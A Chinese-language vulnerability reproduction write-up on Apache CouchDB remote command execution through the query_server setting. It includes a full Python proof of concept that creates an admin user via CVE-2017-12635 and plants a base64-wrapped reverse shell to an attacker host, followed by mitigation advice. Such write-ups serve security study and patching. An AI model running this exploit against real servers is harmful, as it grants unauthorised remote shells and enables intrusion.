0X01 漏洞介绍

CouchDB 是一个开源的面向文档的数据库管理系统，可以通过 RESTful JavaScript Object Notation (JSON) API 访问。CouchDB会默认会在5984端口开放Restful的API接口，用于数据库的管理功能。

CouchDB中有一个Query_Server的配置项，在官方文档中是这么描述的：

 

CouchDB delegates computation of design documents functions to external query servers. The external query server is a special OS process which communicates with CouchDB over standard input/output using a very simple line-based protocol with JSON messages.

 

直白点说，就是CouchDB允许用户指定一个二进制程序或者脚本，与CouchDB进行数据交互和处理，query_server在配置文件local.ini中的格式：

 

[query_servers]

LANGUAGE = PATH ARGS

 

默认情况下，配置文件中已经设置了两个query_servers:

 

[query_servers]

javascript = /usr/bin/couchjs /usr/share/couchdb/server/main.js

coffeescript = /usr/bin/couchjs /usr/share/couchdb/server/main-coffee.js

 

可以看到，CouchDB在query_server中引入了外部的二进制程序来执行命令，如果我们可以更改这个配置，那么就可以利用数据库来执行命令了。

继续读官方的文档，发现CouchDB提供了一个API接口用来更改自身的配置，并把修改后的结果保存到配置文件中：

 

The CouchDB Server Configuration API provide an interface to query and update the various configuration values within a running CouchDB instance

 

也就是说，除了local.ini的配置文件，CouchDB允许通过自身提供的Restful API接口动态修改配置属性。结合以上两点，我们可以在一个未授权访问的CouchDB上，通过修改其query_server配置，来执行系统命令。

0x02 影响版本

小于 1.7.0 以及 小于 2.1.1

0x03 搭建环境

 

0x04 漏洞复现

启动完成后，访问http://your-ip:5984/即可看到Couchdb的欢迎页面。

该漏洞是需要登录用户方可触发，如果不知道目标管理员密码，可以利用CVE-2017-12635先增加一个管理员用户。

执行POC：

 

#!/usr/bin/env python3

import requests

import json

import base64

from requests.auth import HTTPBasicAuth

 

target = 'http://ip:5984'

command = rb"""sh -i >& /dev/tcp/反弹IP/1234 0>&1"""

version = 1

 

session = requests.session()

session.headers = {

    'Content-Type': 'application/json'

}

# session.proxies = {

#     'http': 'http://127.0.0.1:8085'

# }

session.put(target + '/_users/org.couchdb.user:wooyun', data='''{

  "type": "user",

  "name": "wooyun",

  "roles": ["_admin"],

  "roles": [],

  "password": "wooyun"

}''')

 

session.auth = HTTPBasicAuth('wooyun', 'wooyun')

 

command = "bash -c '{echo,%s}|{base64,-d}|{bash,-i}'" % base64.b64encode(command).decode()

if version == 1:

    session.put(target + ('/_config/query_servers/cmd'), data=json.dumps(command))

else:

    host = session.get(target + '/_membership').json()['all_nodes'][0]

    session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=json.dumps(command))

 

session.put(target + '/wooyun')

session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')

 

if version == 1:

    session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}')

else:

    session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}')

 

target、command、version自行修改。

本次环境为1.6.0

执行结果：

 

查看反弹成功：

 

0x05 修复方案

公网Apache CouchDB实例：

建议您升级到最新版本。

使用ECS安全组或防火墙策略，限制CouchDB端口暴露在互联网，设置精细化网络访问控制。

开启认证功能，不要使用默认账号口令，配置自定义账号和强口令，防止暴力破解攻击事件。

内网Apache CouchDB实例：

使用ECS安全组或防火墙策略，限制CouchDB端口暴露在互联网，设置精细化网络访问控制。

开启认证功能，不要使用默认账号口令，配置自定义账号和强口令，防止暴力破解攻击事件。